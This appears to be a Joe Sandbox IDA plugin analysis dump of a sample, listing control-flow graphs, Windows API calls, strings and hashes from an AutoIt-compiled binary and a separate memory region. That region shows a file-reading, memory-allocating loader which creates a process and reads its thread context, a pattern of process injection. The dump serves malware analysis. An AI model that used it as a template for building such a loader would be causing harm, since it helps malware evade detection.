                                                                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                        Control-flow Graph
                                                                        control_flow_graph 2128 4115d7-4115df 2129 4115ee-4115f9 call 4135bb 2128->2129 2132 4115e1-4115ec call 411988 2129->2132 2133 4115fb-4115fc 2129->2133 2132->2129 2136 4115fd-41160e 2132->2136 2137 411610-41163b call 417fc0 call 41130a 2136->2137 2138 41163c-411656 call 4180af call 418105 2136->2138 2137->2138
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                        • std::exception::exception.LIBCMT ref: 00411626
                                                                        • std::exception::exception.LIBCMT ref: 00411640
                                                                        • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                        • String ID: ,*H$4*H$@fI
                                                                        • API String ID: 615853336-1459471987
                                                                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                        Control-flow Graph
                                                                        control_flow_graph 2147 3ec0a40-3ec0aee call 3ebe470 2150 3ec0af5-3ec0b1b call 3ec1950 CreateFileW 2147->2150 2153 3ec0b1d 2150->2153 2154 3ec0b22-3ec0b32 2150->2154 2155 3ec0c6d-3ec0c71 2153->2155 2161 3ec0b39-3ec0b53 VirtualAlloc 2154->2161 2162 3ec0b34 2154->2162 2156 3ec0cb3-3ec0cb6 2155->2156 2157 3ec0c73-3ec0c77 2155->2157 2163 3ec0cb9-3ec0cc0 2156->2163 2159 3ec0c79-3ec0c7c 2157->2159 2160 3ec0c83-3ec0c87 2157->2160 2159->2160 2166 3ec0c89-3ec0c93 2160->2166 2167 3ec0c97-3ec0c9b 2160->2167 2168 3ec0b5a-3ec0b71 ReadFile 2161->2168 2169 3ec0b55 2161->2169 2162->2155 2164 3ec0d15-3ec0d2a 2163->2164 2165 3ec0cc2-3ec0ccd 2163->2165 2172 3ec0d2c-3ec0d37 VirtualFree 2164->2172 2173 3ec0d3a-3ec0d42 2164->2173 2170 3ec0ccf 2165->2170 2171 3ec0cd1-3ec0cdd 2165->2171 2166->2167 2174 3ec0c9d-3ec0ca7 2167->2174 2175 3ec0cab 2167->2175 2176 3ec0b78-3ec0bb8 VirtualAlloc 2168->2176 2177 3ec0b73 2168->2177 2169->2155 2170->2164 2180 3ec0cdf-3ec0cef 2171->2180 2181 3ec0cf1-3ec0cfd 2171->2181 2172->2173 2174->2175 2175->2156 2178 3ec0bbf-3ec0bda call 3ec1ba0 2176->2178 2179 3ec0bba 2176->2179 2177->2155 2187 3ec0be5-3ec0bef 2178->2187 2179->2155 2183 3ec0d13 2180->2183 2184 3ec0cff-3ec0d08 2181->2184 2185 3ec0d0a-3ec0d10 2181->2185 2183->2163 2184->2183 2185->2183 2188 3ec0bf1-3ec0c20 call 3ec1ba0 2187->2188 2189 3ec0c22-3ec0c36 call 3ec19b0 2187->2189 2188->2187 2195 3ec0c38 2189->2195 2196 3ec0c3a-3ec0c3e 2189->2196 2195->2155 2197 3ec0c4a-3ec0c4e 2196->2197 2198 3ec0c40-3ec0c44 CloseHandle 2196->2198 2199 3ec0c5e-3ec0c67 2197->2199 2200 3ec0c50-3ec0c5b VirtualFree 2197->2200 2198->2197 2199->2150 2199->2155 2200->2199
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03EC0B11
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03EC0D37
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileFreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 204039940-0
                                                                        • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                        • Instruction ID: 2495256e2f7d05974ca48cb2620875185506724ccbbe6ce0f2b06d191c8da8a3
                                                                        • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                        • Instruction Fuzzy Hash: 52A11874E10249EBDB14CFA4CA94BEEBBB5BF48308F24929DE501BB280D7759E41CB54

                                                                        Control-flow Graph
                                                                        control_flow_graph 2201 401250-40125c 2202 401262-401293 call 412f40 call 401b80 2201->2202 2203 4012e8-4012ed 2201->2203 2208 4012d1-4012e2 KillTimer SetTimer 2202->2208 2209 401295-4012b5 2202->2209 2208->2203 2210 4012bb-4012bf 2209->2210 2211 4272ec-4272f2 2209->2211 2212 4012c5-4012cb 2210->2212 2213 42733f-427346 2210->2213 2214 4272f4-427315 Shell_NotifyIconW 2211->2214 2215 42731a-42733a Shell_NotifyIconW 2211->2215 2212->2208 2216 427393-4273b4 Shell_NotifyIconW 2212->2216 2217 427348-427369 Shell_NotifyIconW 2213->2217 2218 42736e-42738e Shell_NotifyIconW 2213->2218 2214->2208 2215->2208 2216->2208 2217->2208 2218->2208
                                                                        APIs
                                                                          • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                          • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                          • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                        • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                        • String ID:
                                                                        • API String ID: 3300667738-0
                                                                        • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                        • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                        • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                        • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                                        Control-flow Graph
                                                                        control_flow_graph 2219 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2222 427190-4271ae RegQueryValueExW 2219->2222 2223 40e4eb-40e4f0 2219->2223 2224 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2222->2224 2225 42721a-42722a RegCloseKey 2222->2225 2230 427210-427219 call 436508 2224->2230 2231 4271f7-42720e call 402160 2224->2231 2230->2225 2231->2230
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseOpen
                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                        • API String ID: 1586453840-614718249
                                                                        • Opcode ID: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                        • Opcode Fuzzy Hash: 89069ff54290d95ffeb0e4b83fb23c072447fe8f5d078393e68a3dec861a8096
                                                                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                        APIs
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateShow
                                                                        • String ID: AutoIt v3$edit
                                                                        • API String ID: 1584632944-3779509399
                                                                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Copy$ClearErrorLast
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 2487901850-572801152
                                                                        • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                        • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                        • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                        • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                        APIs
                                                                          • Part of subcall function 03EC0710: Sleep.KERNELBASE(000001F4), ref: 03EC0721
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03EC0937
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileSleep
                                                                        • String ID: SKGP1X9WRC3JNV8N52
                                                                        • API String ID: 2694422964-126846259
                                                                        • Opcode ID: 8ccb9d43d7e13714bfb030ef9ba41fa9e06fd3f2b9a5fb613a87a3226794bf7b
                                                                        • Instruction ID: 61245efca7a9efd673937600b497cb40410abea1865d7e6786f73f0e1ac9c672
                                                                        • Opcode Fuzzy Hash: 8ccb9d43d7e13714bfb030ef9ba41fa9e06fd3f2b9a5fb613a87a3226794bf7b
                                                                        • Instruction Fuzzy Hash: 95519231D14289DAEF11DBA4C814BEFBB78AF44304F044299E209BB2C0D6B95B49CBA5
                                                                        APIs
                                                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        • _wcsncpy.LIBCMT ref: 00401C41
                                                                        • _wcscpy.LIBCMT ref: 00401C5D
                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                        • String ID: Line:
                                                                        • API String ID: 1874344091-1585850449
                                                                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Close$OpenQueryValue
                                                                        • String ID: Control Panel\Mouse
                                                                        • API String ID: 1607946009-824357125
                                                                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                        APIs
                                                                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                        • _wcsncpy.LIBCMT ref: 004102ED
                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                        • _wcsncpy.LIBCMT ref: 00410340
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                        • String ID:
                                                                        • API String ID: 3170942423-0
                                                                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Wu
                                                                        • API String ID: 0-4083010176
                                                                        • Opcode ID: ac2af2b7dd81419509de71c9350aa4b734b6b08f84a213f51213f73945ed2752
                                                                        • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                        • Opcode Fuzzy Hash: ac2af2b7dd81419509de71c9350aa4b734b6b08f84a213f51213f73945ed2752
                                                                        • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentTerminate
                                                                        • String ID: Wu
                                                                        • API String ID: 2429186680-4083010176
                                                                        • Opcode ID: 9ace156a5ba4ea3c1b64ea5599e57396709bab4ff04b71781185cc0804226018
                                                                        • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                        • Opcode Fuzzy Hash: 9ace156a5ba4ea3c1b64ea5599e57396709bab4ff04b71781185cc0804226018
                                                                        • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03EBFECB
                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EBFF61
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EBFF83
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1595095018.0000000003EBE000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EBE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3ebe000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                        • String ID:
                                                                        • API String ID: 2438371351-0
                                                                        • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                        • Instruction ID: 886c04b23a6a4efe9c5f5b8d853a9e78a0b4d604f1575f94700f31c3be8f966b
                                                                        • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                        • Instruction Fuzzy Hash: 5062F930A14258DBEB24CFA4C950BDEB376EF58304F1091A9D10DEB3A1E7799E81CB59
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                        • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                        • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
